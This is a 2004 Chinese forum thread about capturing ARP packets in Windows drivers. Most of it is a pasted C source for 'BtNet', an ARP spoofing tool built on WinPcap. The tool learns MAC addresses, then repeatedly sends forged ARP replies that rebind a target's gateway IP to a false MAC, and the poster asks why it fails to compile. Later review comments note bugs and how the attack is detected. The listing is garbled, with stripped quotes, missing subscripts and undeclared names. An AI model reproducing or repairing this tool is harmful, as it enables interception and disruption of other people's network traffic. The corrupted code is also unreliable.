
慎重,arp的问题。

楼主#
更多 发布于:2004-04-09 16:58
在协议驱动程序中,能捕获arp包吗?
在中间驱动程序中,能捕获arp包吗?

wywwwl
沙发#
发布于:2004-04-09 17:02
在协议驱动程序中,能捕获arp包吗?
在中间驱动程序中,能捕获arp包吗?

都能!
琢磨悟真知
板凳#
发布于:2004-04-09 17:06
不丢包吗?
yangguoo
地板#
发布于:2004-04-12 11:16
首先,能。然后,这是从网上找的arp欺骗的程序,编译的时候总是说少"packet32.h",请问高手怎么回事?
#include \"packet32.h\"
#include \"ntddndis.h\"
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment(lib,\"ws2_32\")
#pragma comment(lib,\"packet\")

/* Protocol constants used when building and matching frames below.
 * 0x0800 and 0x0806 are the EtherType values for IPv4 and ARP. */
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 //ARP request opcode
#define ARP_REPLY 0x0002 //ARP reply opcode
/* Written into arp_hdr (hardware type) by the send routines. */
#define ARP_HARDWARE 0x0001
/* First dimension of adapterlist; nothing visible in main() checks the
 * number of adapter names found against it. */
#define max_num_adapter 10

/* Wire-format headers. They are packed to 1 byte because the code overlays
 * them on captured frame bytes and memcpy()s them into outgoing buffers. */
#pragma pack(push,1)

/* Ethernet header as laid out at the start of a frame. */
typedef struct ethdr
{
unsigned char eh_dst[6]; //destination Ethernet address
unsigned char eh_src[6]; //source Ethernet address
unsigned short eh_type; //EtherType; compared with htons(ETH_ARP) in sniff()
}ETHDR,*PETHDR;
/* ARP header for Ethernet hardware addresses and IPv4 protocol addresses. */
typedef struct arphdr //ARP header
{
unsigned short arp_hdr; //hardware type
unsigned short arp_pro; //protocol type
unsigned char arp_hln; //hardware address length
unsigned char arp_pln; //protocol address length
unsigned short arp_opt; //opcode; set to ARP_REQUEST or ARP_REPLY by the senders
unsigned char arp_sha[6]; //sender Ethernet address
// NOTE(review): the two address fields are unsigned long, so this struct only
// matches the on-wire ARP layout where unsigned long is 32 bits wide.
unsigned long arp_spa; //sender IP address
unsigned char arp_tha[6]; //target Ethernet address
unsigned long arp_tpa; //target IP address
}ARPHDR,*PARPHDR;

/* One IP address with the MAC address learned for it by sniff(). */
typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;

// NOTE(review): this pushes a second time instead of restoring the saved
// packing; pack(pop) looks intended. As written, 1-byte packing stays in
// effect for every declaration that follows in this file.
#pragma pack(push)

/* File-scope state shared by main() and the worker threads it creates.
 * No lock or other synchronisation is visible anywhere in this listing, so
 * the flags and address records below are read and written concurrently. */
// Adapter handle opened in main() and used by every capture/send routine.
LPADAPTER lpAdapter;
// Adapter names copied out of the PacketGetAdapterNames() result in main().
char adapterlist[max_num_adapter][1024];
// Record for the -h address (argv[2]); its MAC is filled in by sniff().
IP_MAC toipandmac;
// Records for the -o address (argv[4]) and for the local adapter address.
IP_MAC oipandmac,myipandmac;
// TRUE once a -m argument has been parsed in main().
BOOL param6=FALSE;
// Cursor into argv[6] while the -m text is being split up.
char *noMACstr;
// Text of the -m MAC address, read back by sendSR().
char noMAC[6][3];
// mytoIP is set by sendSRTimer(); oIP is set from argv[4] in main().
u_long mytoIP,oIP;
// Selects, in sendARPPacket(), between filler source addresses and the
// addresses learned for the local adapter.
BOOL sendtoOip;
// Message-loop and timer state used by sendSRTimer().
MSG msg;
UINT newtimer;
// Sender IP placed in ARP requests while sendtoOip is FALSE.
char MYIP[20]=\"128.128.128.128\";
// Set by sniff() when a matching ARP reply has been seen for each record.
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;

/* Convert one character to a number, returning -1 when it matches none of
 * the three ranges tested. sendSR() combines two results as t1*16+t2, so
 * this is presumably a hexadecimal digit decoder.
 *
 * NOTE(review): as posted, the comparisons are against the integers 9 and 0
 * and the undeclared names a, f, A and F; the character-literal quotes seem
 * to have been lost when the listing was published, so this does not compile
 * as shown. */
int getint(char c)
{
int t=-1;
if((c<=9)&&(c>=0))
t=c-0;
else if((c>=a)&&(c<=f))
t=10+c-a;
else if((c>=A)&&(c<=F))
t=10+c-A;
return t;
}

/* Print the banner and command-line usage text. main() calls this when the
 * argument count or the -h / -o switches do not match what it expects.
 *
 * NOTE(review): the format strings end in a bare n where a newline escape
 * would be expected; the backslashes seem to have been lost in publication. */
void start()
{
printf(\"BtNet //--an ARP Tool test the Windows Break the Internetn\");
printf(\"written by Ruder,10/2003n\");
printf(\"Homepage: http://xEyes.cdut.net/ruder/index.htm;n\");
printf(\"E-mail: cocoruder@163.comn\");
printf(\"nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n\");
printf(\"Example:n\");
printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1n\");
printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn\");
printf(\" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alphan\");
return ;
}

/* Capture thread: reads frames from the adapter in promiscuous mode and, for
 * each ARP reply whose sender IP equals one of the three configured
 * addresses, prints the pair and records the frame source MAC in the
 * matching global record, then sets that record's flag.
 *
 * Returns 0 in every case: on setup failure, on a failed receive, on a key
 * press, or once all three flags are set.
 *
 * NOTE(review), robustness of the parser:
 *  - bh_hdrlen and bh_caplen come from the capture buffer and are used
 *    without checking that the resulting offsets stay below ulbytesreceived,
 *    or that bh_caplen covers sizeof(ETHDR)+sizeof(ARPHDR) before the two
 *    headers are dereferenced. A short or malformed record leads to reads
 *    outside the received data.
 *  - lppackets is allocated and never used or freed; lpPacketr is not freed
 *    on any return path.
 *  - The flags and records written here are read by other threads with no
 *    synchronisation visible in this listing. */
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
// 250 KB automatic array on this thread's stack.
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;

if((lppackets=PacketAllocatePacket())==FALSE)
{
printf(\"PacketAllocatePacket send Error: %dn\",GetLastError());
return 0;
}

// Failure here is only reported; capture continues without promiscuous mode.
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf(\"Warning: Unable to set the adapter to promiscuous moden\");
}

if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf(\"PacketSetBuff Error: %dn\",GetLastError());
return 0;
}

if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf(\"Warning: Unable to set the timeoutn\");
}

if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf(\"PacketAllocatePacket receive Error: %dn\",GetLastError());
return 0;
}

PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

// Outer loop: one PacketReceivePacket() call per pass, until a key is pressed.
while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;

// Inner loop: walk the records in the buffer, each prefixed by a bpf_hdr.
off=0;
while(off<ulbytesreceived)
{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;

pChar=(char *)(buf+off);
base=pChar;
// Advance to the next record now; pChar still points at this frame.
off=Packet_WORDALIGN(off+hdr->bh_caplen);

eth=(PETHDR)pChar; //Ethernet header
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //ARP header
int i;

// Only ARP replies are of interest.
if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
// Stop capturing once all three addresses have been resolved.
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
// Accept the reply only for an address that is still unresolved.
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));

printf(\"[IP]:\");
printf(\"%s\",inet_ntoa(*((struct in_addr *)szTemp)));
printf(\"[MAC]:\");
// NOTE(review): here and in the three copy loops below the array is used
// without a subscript; the index seems to have been lost in publication,
// so these lines do not compile as shown.
for(i=0;i<5;i++)
{
printf(\"%.2x-\",eth->eh_src);
}
printf(\"%.2x\",eth->eh_src[5]);
printf(\"n\");

// The MAC recorded is the frame source address, not arp_sha.
if (toipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
toipandmac.mac=eth->eh_src;
toipandmac_flag=TRUE;
}

if (oipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
oipandmac.mac=eth->eh_src;
oipandmac_flag=TRUE;
// printf(\"if you have get the MAC Addresses enough,Press any key for staring!n\");
}
if(myipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
myipandmac.mac=eth->eh_src;
myipandmac_flag=TRUE;
}
}
}
}
continue;
}
}
return 0;
}


/* Thread routine: build one broadcast ARP request for the IP address that
 * dwsendtoIP points to and send it on lpAdapter. The replies are what
 * sniff() uses to learn MAC addresses.
 *
 * While sendtoOip is FALSE the source MAC is the filler byte 0xa5 and the
 * sender IP is the MYIP placeholder; once it is TRUE the addresses learned
 * for the local adapter (myipandmac) are used instead, and the routine gives
 * up if they are not known yet.
 *
 * dwsendtoIP: pointer to a u_long holding the IP in host byte order.
 * Returns 0 in every case.
 *
 * NOTE(review):
 *  - lpPacket is not freed on the return inside the else branch below.
 *  - The first memcpy names an identifier e that is not declared anywhere
 *    in this listing, and the address arrays are assigned without a
 *    subscript; both look like publication damage and do not compile as
 *    shown. */
DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
LPPACKET lpPacket;
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
u_long sendtoIP=*(u_long *)dwsendtoIP;
//struct sockaddr_in sin;

lpPacket = PacketAllocatePacket();
if(lpPacket==NULL)
{
printf(\"nPacketAllocatePacket error!\");
return 0;
}
eth.eh_type=htons(ETH_ARP);
// Default addressing: broadcast destination, 0xa5 filler as the source.
for(i=0;i<6;i++)
{
eth.eh_dst=0xff;
eth.eh_src=0xa5;
arphdr.arp_sha=0xa5;
arphdr.arp_tha=0xff;
}

arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REQUEST);
arphdr.arp_hln=6;
arphdr.arp_pln=4;

arphdr.arp_tpa=htonl(sendtoIP);
arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
// Second phase: replace the filler source with the local adapter addresses.
if(sendtoOip)
{


if(myipandmac_flag)
{
for(i=0;i<6;i++)
{
eth.eh_src=myipandmac.mac;
arphdr.arp_sha=myipandmac.mac;
arphdr.arp_spa=htonl(myipandmac.ip);
//memset(MYIP,0,sizeof(MYIP));

}
}
else
{
printf(\"My MAC Address Cant Find!n\");
return 0;
}
}

// Zero the buffer first so the bytes after the two headers are padding.
memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,e,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

// Only the first 60 bytes of the 600-byte buffer are handed to the driver.
PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf(\"warning: Unable to send more than one packet in a single write!n\");
}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf(\"Error sending the packets!n\");
PacketFreePacket(lpPacket);
return 0;
}

PacketFreePacket(lpPacket);

return 0;
}


/* Timer callback installed by sendSRTimer(): build and send one ARP reply
 * addressed to the MAC learned for the -h host. The reply carries oIP (the
 * -o address, called gateIP in the usage text) as its sender IP, paired with
 * either the -m MAC or, without -m, the MAC of the -h host itself. That
 * IP-to-MAC pairing does not belong to the real owner of oIP.
 *
 * Returns 0 in every case.
 *
 * Defensive reading: on the wire this is an unsolicited ARP reply, repeated
 * at the 5*1000 ms interval set in sendSRTimer(), that rebinds a gateway IP
 * to a different MAC. That pattern is what ARP-cache monitoring and
 * switch-level dynamic ARP inspection look for, and a static ARP entry for
 * the gateway makes a host ignore it.
 *
 * NOTE(review):
 *  - The function takes no parameters and returns DWORD, yet it is cast to
 *    TIMERPROC where it is installed; the signatures do not match.
 *  - lpPacket is not freed on the two early returns after allocation.
 *  - The array accesses without a subscript and the undeclared identifier e
 *    in the first memcpy look like publication damage and do not compile as
 *    shown. */
DWORD WINAPI sendSR()
{
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
LPPACKET lpPacket;
unsigned char toMAC[6];
struct sockaddr_in sin;
u_long toIP=mytoIP;

//if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
//{
// printf(\"Cant get all MAC address!n\");
// return 0;
//}
lpPacket = PacketAllocatePacket();
if(lpPacket == NULL)
{
printf(\"nError:failed to allocate the LPPACKET structure.n\");
return 0;
}
// Nothing is sent until sniff() has recorded the MAC of the -h host.
if (toipandmac_flag==FALSE)
{
printf(\"Cant get toMAC address!n\");
return 0;
}

memset(toMAC,0,sizeof(toMAC));
memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));

// With -m: the source addresses come from the two-character text in noMAC.
if (param6)
{
for(i=0;i<6;i++)
{
int t1,t2;
char c1,c2;
c1=noMAC[0];
c2=noMAC[1];

t1=getint(c1);
t2=getint(c2);

if((t1==-1)||(t2==-1))
{
printf(\"-m parameter error!n\");
return 0;
}

eth.eh_src=t1*16+t2;
eth.eh_dst=toMAC;
arphdr.arp_sha=t1*16+t2;
arphdr.arp_tha=toMAC;
}
}
// Without -m: all four address fields are filled from toMAC.
else
{
for(i=0;i<6;i++)
{
eth.eh_src=toMAC;
eth.eh_dst=toMAC;
arphdr.arp_sha=toMAC;
arphdr.arp_tha=toMAC;
}
}

eth.eh_type=htons(ETH_ARP);

arphdr.arp_spa=htonl(oIP);
arphdr.arp_tpa=htonl(toIP);

arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REPLY);
arphdr.arp_hln=6;
arphdr.arp_pln=4;

memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,e,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

// Only the first 60 bytes of the 600-byte buffer are handed to the driver.
PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf(\"warning: Unable to send more than one packet in a single write!n\");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf(\"Error sending the packets!n\");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);

// Log the target IP, the sender IP and the sender MAC that were just sent.
sin.sin_addr.s_addr=arphdr.arp_tpa;

printf(\"spoof %s: \",inet_ntoa(sin.sin_addr));
sin.sin_addr.s_addr=arphdr.arp_spa;
printf(\"%s-->\",inet_ntoa(sin.sin_addr));

for(i=0;i<5;i++)
printf(\"%.2x-\",arphdr.arp_sha);
printf(\"%x\",arphdr.arp_sha[5]);
printf(\"n\");

return 0;
}


/* Thread routine: store the IP that dwtoIP points to in the global mytoIP,
 * install sendSR() as a timer callback with a 5*1000 ms period, and run a
 * message loop so the timer messages are dispatched on this thread.
 *
 * dwtoIP: pointer to a u_long; main() passes the address of its toIP local.
 * Returns 0 when GetMessage() ends the loop.
 *
 * NOTE(review): sendSR is cast to TIMERPROC although it is declared with no
 * parameters and a DWORD return. The timer id kept in newtimer is never
 * passed to KillTimer() in this listing. */
DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
printf(\"Waiting spoof Startn\");
mytoIP=*(u_long *)dwtoIP;
newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));

while(GetMessage(&msg,0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}

/* Entry point. Parses -h, -o and the optional -m, lists the installed
 * adapters, opens the one the user picks, prints its link and address
 * information, then starts the capture thread, three short-lived ARP-request
 * threads and the timer thread, and waits for the timer thread.
 *
 * Returns 0 after the usage text or a normal finish, and -1 when adapter
 * enumeration, opening or address lookup fails.
 *
 * NOTE(review), input handling:
 *  - The inet_addr() results for argv[2] and argv[4] are not checked for
 *    failure.
 *  - The -m loop copies two characters and advances three on each of six
 *    passes without checking the length of argv[6], so a short argument is
 *    read past its end.
 *  - The adapter-name loop checks neither max_num_adapter nor the 1024-byte
 *    row size before copying.
 *  - The scanf() return value is ignored; if no number is parsed, open is
 *    used uninitialised.
 *  - Several array uses lack a subscript and the character literals in the
 *    name loop are empty; this looks like publication damage and does not
 *    compile as shown. */
int main(int argc,char *argv[])
{
HANDLE thread1,thread2,thread3;
WCHAR adaptername[8192];
WCHAR *name1,*name2;
ULONG adapterlength;
DWORD threadid1,threadid2,threadid3;
u_long toIP,myip;
struct NetType ntype;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum=0,opti=0,open,i,j;
long npflen;

// Exactly four or six arguments are accepted, with -h first and -o third.
if((argc!=5)&&(argc!=7))
{
start();
return 0;
}
else if((strcmp(argv[1],\"-h\")!=0)||(strcmp(argv[3],\"-o\")!=0))
{
start();
return 0;
}

// Both addresses are kept in host byte order.
toIP=ntohl(inet_addr(argv[2]));
oIP=ntohl(inet_addr(argv[4]));

if (argv[5]!=NULL)
{
if (strcmp(argv[5],\"-m\")==0)
{
noMACstr=argv[6];
j=0;

// Two characters are taken per pass and the cursor skips one separator.
for(i=0;i<6;i++)
{
memset(noMAC,0,sizeof(noMAC));
memcpy(noMAC,noMACstr,2);
noMACstr=noMACstr+3;
}
param6=TRUE;
}
}
printf(\"nLibarary Version: %s\",PacketGetVersion());
adapterlength=sizeof(adaptername);

if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) //get the list of network adapters
{
printf(\"PacketGetAdapterNames Error: %dn\",GetLastError());
return -1;
}

name1=adaptername;
name2=adaptername;
i=0;

// Split the returned name list into adapterlist, counting entries in i.
while((*name1!=) || (*(name1-1)!=))
{
if(*name1==)
{
memcpy(adapterlist,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}

adapternum=i;
printf(\"nAdapters Installed:n\");
for(i=0;i<adapternum;i++)
wprintf(L\"%d - %sn\",i+1,adapterlist);

// Prompt until a number between 1 and adapternum is entered.
do
{
printf(\"nSelect the number of the adapter to open: \");
scanf(\"%d\",&open);
if(open>=1 && open<=adapternum)
break;
}while(open<1 || open>adapternum);

lpAdapter=PacketOpenAdapter(adapterlist[open-1]);

if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf(\"PacketOpenAdapter Error: %dn\",GetLastError());
return -1;
}

if(PacketGetNetType(lpAdapter,&ntype))
{
printf(\"ntt*** Host Information ***n\");
printf(\"[LinkTpye:]t%dtt\",ntype.LinkType);
printf(\"[LinkSpeed:]t%d b/sn\",ntype.LinkSpeed);
}

npflen=sizeof(ipbuff);
if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
{
sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
printf(\"[Broadcast:]t%.16st\",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
printf(\"[SubnetMask:]t%.16sn\",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
printf(\"[IPAddress:]t%.16st\",inet_ntoa(sin.sin_addr));
// The local adapter address, kept in host byte order like toIP and oIP.
myip=ntohl(sin.sin_addr.s_addr);

printf(\"[MACAddress:]\");
}
else
{
printf(\"nNot get enough datan\");
//PacketFreePacket(lppackets);
PacketCloseAdapter(lpAdapter);
return -1;
}
printf(\"n\");

oipandmac.ip=oIP;
toipandmac.ip=toIP;
myipandmac.ip=myip;
sendtoOip=FALSE;

// The threads below are ordered only by the fixed Sleep() delays; nothing
// waits for sniff() to have recorded a MAC before the next step starts.
// thread1 and thread3 are never passed to CloseHandle().
thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
Sleep(300);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
Sleep(100);
CloseHandle(thread2);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
sendtoOip=TRUE;
Sleep(200);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
// WaitForSingleObject(thread1,INFINITE);
thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
WaitForSingleObject(thread3,INFINITE);

PacketCloseAdapter(lpAdapter);

return 0;
}

[img]http://www.driverdevelop.com/forum/upload/Xman/2004-04-05_2004324183110706.jpg[/img][size=3]跟我比灌水,年[/size]